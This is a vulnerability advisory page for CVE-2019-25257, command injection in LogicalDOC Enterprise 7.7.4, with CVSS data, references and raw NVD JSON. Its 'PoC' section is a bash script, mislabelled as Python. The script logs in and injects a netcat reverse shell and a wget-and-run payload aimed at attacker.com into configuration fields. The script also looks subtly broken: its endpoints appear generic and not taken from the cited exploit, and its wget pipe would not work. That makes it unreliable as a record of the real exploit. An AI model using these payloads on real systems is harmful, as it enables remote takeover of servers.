CVE-2019-25257

Description

LogicalDOC Enterprise 7.7.4 contains multiple authenticated OS command execution vulnerabilities that allow attackers to manipulate binary paths when changing system settings. Attackers can exploit these vulnerabilities by modifying configuration parameters like antivirus.command, ocr.Tesseract.path, and other system paths to execute arbitrary system commands with elevated privileges.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

LogicalDOC Enterprise 7.7.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2019-25257 PoC - LogicalDOC Enterprise Authenticated OS Command Execution
# Requires valid low-privilege credentials

TARGET="http://targetLogicalDOC.com"
USERNAME="lowpriv_user"
PASSWORD="password123"

# Authentication
SESSION=$(curl -s -c cookies.txt -d "username=$USERNAME&password=$PASSWORD" "$TARGET/api/login")

# Exploit 1: Modify antivirus.command parameter
PAYLOAD=";nc -e /bin/bash attacker.com 4444 #"
curl -s -b cookies.txt -X POST \
  -H "Content-Type: application/json" \
  -d "{\"antivirus.command\": \"$PAYLOAD\"}" \
  "$TARGET/api/config/system"

# Exploit 2: Modify ocr.Tesseract.path parameter
PAYLOAD2=";wget http://attacker.com/malware.sh | bash #"
curl -s -b cookies.txt -X POST \
  -H "Content-Type: application/json" \
  -d "{\"ocr.Tesseract.path\": \"$PAYLOAD2\"}" \
  "$TARGET/api/config/ocr"

# Trigger command execution by invoking the configured binary
curl -s -b cookies.txt "$TARGET/api/system/scan?path=/tmp"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25257
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25257
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25257/
[4] VulDB https://vuldb.com/cve/CVE-2019-25257
[5] https://www.exploit-db.com/exploits/44021
[6] https://www.logicaldoc.com
[7] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5452.php
[8] https://www.exploit-db.com/exploits/44021
[9] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5452.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25257", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:54.467", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "LogicalDOC Enterprise 7.7.4 contains multiple authenticated OS command execution vulnerabilities that allow attackers to manipulate binary paths when changing system settings. Attackers can exploit these vulnerabilities by modifying configuration parameters like antivirus.command, ocr.Tesseract.path, and other system paths to execute arbitrary system commands with elevated privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-426"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/44021", "source": "[email protected]"}, {"url": "https://www.logicaldoc.com", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5452.php", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/44021", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5452.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}